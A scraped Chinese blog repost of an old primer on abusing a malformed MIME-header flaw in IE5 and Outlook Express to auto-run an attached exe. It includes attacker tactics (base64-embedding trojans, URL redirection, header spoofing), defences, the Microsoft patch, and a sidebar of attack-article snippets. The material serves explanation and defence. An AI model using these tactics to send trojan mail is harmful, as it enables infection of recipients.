//8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA=



--1
(文件结束)
——————————————————————————————————
未完待续。

利用错误的MIME头实行攻击--4
—————————————————————————————————
badboy  坏男孩俱乐部
badboyclub.yofor.net
badboyclub.163.net
badboyclub.go.163.com
这只是网络安全初级读物,只适合菜鸟了解win9x、NT存在的不安全面,切莫
用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由
你自己负责。
本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目
的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人
将保留侵权控告的权利。
本文内所谈到的程序具有一定的危害性,如果你安全技术能力有限,请勿测试。
—————————————————————————————————
五、错误MIME头信件自动执行exe文件(续)
我们可以从文件中看到
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>
攻击者可以采用BASE64编码将一个可执行文件直接附带进来,不需要利用本地
文件系统的已有文件。我们先执行这个例子,把以上文件源码存为exe.eml文件,
运行它,我们可以看到hello.exe这文件自动被执行,多么可怕的事啊,在这之前,
一些攻击者想法子骗被攻击目标执行修改过的木马等后门程序,而现在,一切都
是自动执行,唯一的条件就是被攻击目标使用IE5.0 IE5.01 IE5.5而这种浏览器
的用户是目前世界上最多的,稍微有点入侵知识的人对这点的危害是十分清楚的。
对于利用错误MIME头漏洞执行EXE的傻瓜式软件,中国的一位黑客软件设计者小
榕已经在他的网站提供软件下载。
对于不会编写BASE64编码的入侵者来说,可以利用一些信件软件如foxmail,就
可以很容易得到你想得到的一些木马或者攻击行软件的BASE64的编码格式文件,
具体的操作方法是,你用FOXMAIL写一封信,然后把你想得到BASE64编码的软件
增加到附件中去,然后查看信件的全部信息,这样就可以得到该EXE文件的BASE64
编码格式的代码。
而实际上无论哪种方式利用这漏洞进行攻击的,参照以上例子,是很容易可以写
出来的。

六、实行攻击方式的入侵思维
并不是说我鼓励你利用这些漏洞和方法去攻击别人,但如果我们不从攻击者的思
考方式去猜想别人的攻击,我们又如何知道别人会怎么设圈套和利用哪些方式去
攻击你呢?正所谓知彼知已,百战不殆。
1、在outlook或者Foxmail等工具是无法直接编写出这种错误的MIME头信件的,
攻击者一般来说是通过用记事本这样的编辑工具编写错误的MIME头信件,然后利
用Email工具的导入功能,再把信件发出去。
2、攻击者也可以给你写一HTML格式的信件,或者叫你前往某WEB页面浏览某一特
定的页面,在这页面里,攻击者利用一些RUL转向技术,迫使你受到早已放在某一
主机上的错误MIME头格式的攻击性文件。
3、利用一些黑客为这漏洞编写的特定的攻击性软件,如前面提到的小榕写的那个
OEexample
4、在攻击性的MIME信件中嵌入对方国家少见的病毒木马。
5、攻击者一定会修改mime的头部信息,让被攻击者难以发现攻击来源。

针对以上的可能性,我们建议大家做到以下的预防措施和一些临时的解决方法:
1、在微软公司尚未公布漏洞的最终补丁之前,最好的方法是不要使用IE和Outlook
/Outlook Express浏览和接受Email信件,可以用其他的浏览器Netscape、netants、
wget工具代替IE,用FOXMAIL等工具代替OUTLOOK。
2、不要受陌生人的诱惑打开别人给你的RUL,如果确实想看,可以通过一些下载
工具,把页面下载,用记事本等一些文本编辑工具打开查看代码。
3、在只能使用IE浏览器和资源管理器的情况下,建议禁止"文件下载"、禁止以WEB
方式使用资源管理器、最大限度禁止活动内容特性、设置资源管理器成"始终显示
扩展名"、永远不直接从IE浏览器中选择打开文件、取消"下载后确认打开"这种扩
展名属性设置。
  
七、错误的MIME头漏洞的解决办法
对于一般上网用户,可以通过开始-windows update 在线自动升级你的windows和
IE、outlook/outlook Express。

微软公司为这漏洞提供了一补丁,可以到下面地址获取:
http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp
一些关于这漏洞的附加信息:
这补丁可以安装在运行Internet Explorer 5.01 Service Pack 1 或者Internet
Explorer 5.5 Service Pack 1上。
漏洞修补的补丁将收录在Internet Explorer 5.01 Service Pack 2、Internet
Explorer 5.5 Service Pack 2.

  流星的光芒虽短促,但天上还有什么星能比它更灿烂,辉煌? 
  当流星出现的时候,就算是永恒不变的星座,也夺不去它的光彩. 
  蝴蝶的生命是脆弱的甚至比鲜艳的花还脆弱. 
  可是它永远是活在春天里.它美丽,它自由,它飞翔. 
  它的生命虽短促却芬芳. 
  流星消逝的时候,光明己在望.黑暗无论多长,光明迟早总会来的. 
  
  
        有空去我们的站Patching Heroes   
           www.patching.net 
    计算机是一门只靠书本和自己上机就能掌握的技能 

scrub
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全过滤绕过攻击过程,MIME方式的过滤
weixin_52992693的博客
04-26 613
文件名过滤绕过攻击过程,上传文件的页面为file_upload.html,点击上传的提交按钮开始上传;上传的文件被file_handle.php接收到,在该文件中,具有以MIME方式的过滤,仅允许上传jpg、gif、bmp类型的文件,通过验证的文件存储到当前目录中的upload文件夹中;编写一个名为server_info.php的攻击文件,现利用上传页面上传该文件,并且能够通过file_handle.php文件的验证,存储到指定的文件夹中;最后,打开该攻击文件,查看服务器的信息。
深刻理解什么是MIME类型及其在文件上传漏洞中的妙用
weixin_52796034的博客
08-23 517
MIME(Multipurpose Internet Mail Extensions)类型是在互联网上用于标识文件类型的标准方式。它在很多应用中得到了广泛的应用,例如电子邮件、Web浏览器和Web服务器等。MIME类型是由两部分组成的,第一部分是媒体类型(media type),用来表示文件的大类别,例如text、image、audio、video等,第二部分是子类型(sub-type),用来表示具体的文件类型,例如text/plain、image/jpeg、audio/mpeg、video/mp4等。
【web安全】——文件上传漏洞
Demo不是emo的博客
01-14 9165
文件上传是什么漏洞?让我带你看看吧
MIME类型绕过漏洞
whatiwhere的博客
11-15 7856
实验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 掌握上传绕过服务端MIME的原理 掌握上传绕过服务端MIME的方法 实验工具 Burp Suite: 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP ...
MIME sniffing攻击
weixin_30462049的博客
11-01 1264
基于IE的MIME sniffing功能的跨站点脚本攻击 IE有一个特性,那就是在将一个文件展示给用户之前会首先检查文件的类型,这乍看起来并没什么问题,但实际上这是相当危险的,因为这会允许IE执行图片中的代码,即嵌入在一个图像中的JavaScript代码。引入MIME sniffing功能的初衷是用来弥补Web服务器响应一个图像请求时有可能返回错误的内容类型信息这一缺陷。   但是事...
host攻击.pdf
05-07
### Host攻击详解及防御措施 #### 一、Host攻击概述 Host攻击是一种针对Web应用程序的安全漏洞,主要利用HTTP请求中的Host字段来进行恶意操作。通常情况下,Web服务器和应用程序通过解析HTTP请求中的Host...
定向网络攻击:由漏洞利用与恶意软件驱动的多阶段攻击
06-23
定向网络攻击:由漏洞利用与恶意软件驱动的多阶段攻击 作者:(美)阿迪蒂亚·苏德,(美)理查德·尹鲍德 著,孙宇军 等译出版社:国防工业出版社
XSS跨站攻击课程.pdf
01-25
- **定义**:XSS(Cross-Site Scripting)即跨站脚本攻击,是指攻击利用网站漏洞,将恶意脚本代码注入到网页中,当其他用户浏览这些网页时,就会在用户的浏览器上执行恶意代码。XSS攻击通常发生在用户与Web应用...
跨站脚本攻击实例解析
06-08
此文档是本人亲自整理过的相对通俗易懂的一个跨站脚本攻击实例解析
DDoS攻击--防护本质
02-24
DDoS全称DistributedDenialofService,中文意思为“分布式拒绝服务”,俗称洪水攻击,就是利用大量合法的分布式服务器对目标发送请求,从而导致正常合法用户无法获得服务。服务:系统提供的,用户在对其使用中会受益...
mime .php,php – MIME类型欺骗
weixin_42518334的博客
03-10 238
在php中检查mime类型非常简单,但据我所知,mime可能会被欺骗.攻击者可以使用例如jpeg mime类型上传php脚本.我想到的一件事是检查上传文件的文件扩展名,并确保它与mime类型匹配.所有这一切都假设上传目录是浏览器可访问的.问题:是否还有其他技术可以防止“坏文件”进入mime类型欺骗?解决方法:简答:不.更长的回答:比较扩展并确保它与MIME类型匹配并不能真正阻止任何事情.正如评论中...
(laravel,apache,nginx )响应设置 (有关iframe嵌套,xss 攻击,防止基于 MIME 类型混淆的攻击)的配置
qq_35190486的博客
11-16 1062
nginx 配置 server { listen 80; server_name nestle.com ; root "D:\install\PHPTutorial\WWW\skscrm\dist"; add_header X-Frame-Options SAMEORIGIN; add_header X-XSS-Protection '1; mode=block'; add_header ...
IE 不能正确处理 MIME 格式邮件附件导致执行攻击者代码漏洞(NIMDA就是利用了此漏洞)
yztgx的专栏
07-19 3022
#!/usr/bin/perl #in bugtraq post User may be fooled to execute programs browsing with IE5.1 #so I write a script to exploit it, just a test, have fun :) # # http://www.xfocus.org use Mail::Sendmail; $
i春秋:警惕您站上的MIME类型绕过漏洞
MyBack
06-01 2434
实验环境 实验环境 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.com实验工具:中国菜刀 burp 实验目的 MIME的作用:使客户端软件,Web服务器使用MIME来说明发送数据的种类, Web客户端使用MIME来说明希望接收到的数据种类。本课程带领大家了解MIME部信息过滤不严带来的严重后果以及防御方法,使大
WEB网站常见的攻击方法总结与原理分析
dvt777的博客
09-27 1万+
一个网站建立以后,如果不注意安全方面的问题,很容易被人攻击,下面就讨论一下几种常见的漏洞的简介与原理分析 一.跨站脚本攻击(xss)        恶意攻击者通过往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。下面我们来分析一下xss的特点: 1、耗时间 2、有一定几率不成功 3、没有相应的软件来完
网络安全-文件上传漏洞的原理、攻击与防御
热门推荐
关注网络安全、云原生安全
08-16 1万+
介绍 文件上传漏洞是指用户上传了一个可执行的脚本文件(php、jsp、xml、cer等文件),而WEB系统没有进行检测或逻辑做的不够安全。文件上传功能本身没有问题,问题在于上传后如何处理及解释文件。 分类 根据简介,主要分为上传(客户端)、解析(服务端)两大类。 上传-javascript检测 简介 通过js代码,对文件后缀进行判断。 原理 一般使用白名单或黑名单的方式,判断文件后缀,根据后缀决定用户是否上传。 攻击 Firebug插件删除判断函数 使用靶机pikachu做例子,直接通
IIS发布打包后文件
qq_38552198的博客
08-16 283
1.打开IIS软件 2 添加网站, 自定义网站名称-选择要放置的资源路径-选择IP地址 3.打开放置的资源目录放置打包后文件 4.选择浏览
微软开源项目 Detours 详细介绍与使用实例分享
dvlinker的技术专栏
08-15 9864
本文详细介绍微软开源库Detours,并分享使用Detours实现函数hook的实例。
微软运行库全集合:一站式解决兼容性问题
最新发布
dntkorg的博客
08-16 537
开发者在部署应用程序时经常遇到因缺少运行库而引发的兼容性问题。为了解决这一问题,电脑天空推荐,一个集成了微软多个关键运行库组件的软件包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值